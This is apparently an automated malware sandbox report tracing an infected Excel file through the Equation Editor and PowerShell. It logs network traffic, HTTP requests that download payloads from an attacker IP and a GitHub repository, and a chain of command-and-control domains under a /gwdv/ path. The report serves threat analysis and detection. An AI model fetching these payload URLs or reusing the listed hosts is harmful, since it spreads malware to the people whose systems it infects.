      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 38.240.41.28:80
      Source: global trafficTCP traffic: 38.240.41.28:80 -> 192.168.2.22:49170

      Networking

      barindex
      Source: C:\Windows\explorer.exeDomain query: www.my-tournament.live
      Source: C:\Windows\explorer.exeDomain query: www.senior-dating-73474.bond
      Source: Malware configuration extractorURLs: www.lefeetlab.net/gwdv/
      Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /333/RCCRER.txt HTTP/1.1Host: 38.240.41.28Connection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
      Source: Joe Sandbox ViewASN Name: TTSLMEIS-AS-APTTSL-ISPDIVISIONIN TTSLMEIS-AS-APTTSL-ISPDIVISIONIN
      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: global trafficHTTP traffic detected: GET /a080 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: m2g.meConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.41.28Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /333/wegivenewthingssoonsweetness.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.41.28Connection: Keep-Alive
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49164 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49166 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49167 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49171 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: unknownTCP traffic detected without corresponding DNS query: 38.240.41.28
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2189D102.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /a080 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: m2g.meConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /333/erf/sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.41.28Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /333/wegivenewthingssoonsweetness.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 38.240.41.28Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /333/RCCRER.txt HTTP/1.1Host: 38.240.41.28Connection: Keep-Alive
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: m2g.me
      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
      Source: global trafficDNS traffic detected: DNS query: www.my-tournament.live
      Source: global trafficDNS traffic detected: DNS query: www.senior-dating-73474.bond
      Source: powershell.exe, 0000000F.00000002.481286410.0000000002737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.41.28
      Source: powershell.exe, 0000000F.00000002.481286410.0000000002737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.240.41.28/333/RCCRER.txt
      Source: EQNEDT32.EXE, EQNEDT32.EXE, 0000000A.00000002.457404103.0000000000914000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000002.457404103.0000000000939000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000002.457404103.000000000097F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000003.456752146.000000000097F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.41.28/333/wegivenewthingssoonsweetness.tIF
      Source: EQNEDT32.EXE, 0000000A.00000002.457404103.000000000097F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000A.00000003.456752146.000000000097F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFC:
      Source: EQNEDT32.EXE, 0000000A.00000002.457404103.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://38.240.41.28/333/wegivenewthingssoonsweetness.tIFj
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: aspnet_regbrowsers.exe, 00000011.00000002.490337170.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsMR
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: powershell.exe, 0000000F.00000002.481286410.0000000002B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
      Source: powershell.exe, 0000000F.00000002.486232559.00000000034B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: powershell.exe, 0000000C.00000002.501592598.0000000002340000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.481286410.0000000002491000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.487220752.0000000002281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/kursovaSQLDataSet.xsd
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.3dnu3uix.college
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.3dnu3uix.college/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.3dnu3uix.college/gwdv/www.nasocnite.xyz
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.3dnu3uix.collegeReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.accountingcourse06.shop
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.accountingcourse06.shop/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.accountingcourse06.shop/gwdv/www.highercall.net
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.accountingcourse06.shopReferer:
      Source: explorer.exe, 00000017.00000000.486184316.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637462841.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blackwavetattoostudio.com
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blackwavetattoostudio.com/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blackwavetattoostudio.com/gwdv/www.spanish-classes-13883.bond
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blackwavetattoostudio.comReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.boyxlife.cyou
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.boyxlife.cyou/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.boyxlife.cyou/gwdv/www.blackwavetattoostudio.com
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.boyxlife.cyouReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-84866.bond
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-84866.bond/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-84866.bond/gwdv/www.boyxlife.cyou
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-84866.bondReferer:
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: powershell.exe, 0000000F.00000002.493641023.0000000005151000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.divineworks.store
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.divineworks.store/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.divineworks.store/gwdv/www.lingerie-16071.bond
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.divineworks.storeReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.highercall.net
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.highercall.net/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.highercall.net/gwdv/www.incronizid.dev
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.highercall.netReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incronizid.dev
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incronizid.dev/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incronizid.dev/gwdv/www.lefeetlab.net
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incronizid.devReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intelliflow.run
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intelliflow.run/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intelliflow.run/gwdv/www.3dnu3uix.college
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.intelliflow.runReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lefeetlab.net
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lefeetlab.net/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lefeetlab.net/gwdv/www.dental-implants-84866.bond
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lefeetlab.netReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lingerie-16071.bond
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lingerie-16071.bond/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lingerie-16071.bond/gwdv/www.accountingcourse06.shop
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lingerie-16071.bondReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lmodt.info
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lmodt.info/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lmodt.info/gwdv/www.divineworks.store
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lmodt.infoReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.my-tournament.live
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.my-tournament.live/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.my-tournament.live/gwdv/www.senior-dating-73474.bond
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.my-tournament.liveReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nasocnite.xyz
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nasocnite.xyz/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nasocnite.xyz/gwdv/P
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nasocnite.xyzReferer:
      Source: explorer.exe, 00000017.00000000.488448630.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.488448630.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638410089.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.00000000070AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.00000000070AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000017.00000002.638907259.00000000070AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.00000000070AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleane
      Source: explorer.exe, 00000017.00000000.488448630.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.489481018.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.488448630.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638907259.0000000007123000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.638410089.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000017.00000000.487849649.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.637917540.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.senior-dating-73474.bond
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.senior-dating-73474.bond/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.senior-dating-73474.bond/gwdv/www.lmodt.info
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.senior-dating-73474.bondReferer:
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spanish-classes-13883.bond
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spanish-classes-13883.bond/gwdv/
      Source: explorer.exe, 00000017.00000002.638907259.0000000007103000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.spanish-classes-13883.bond/gwdv/www.intelliflow.run
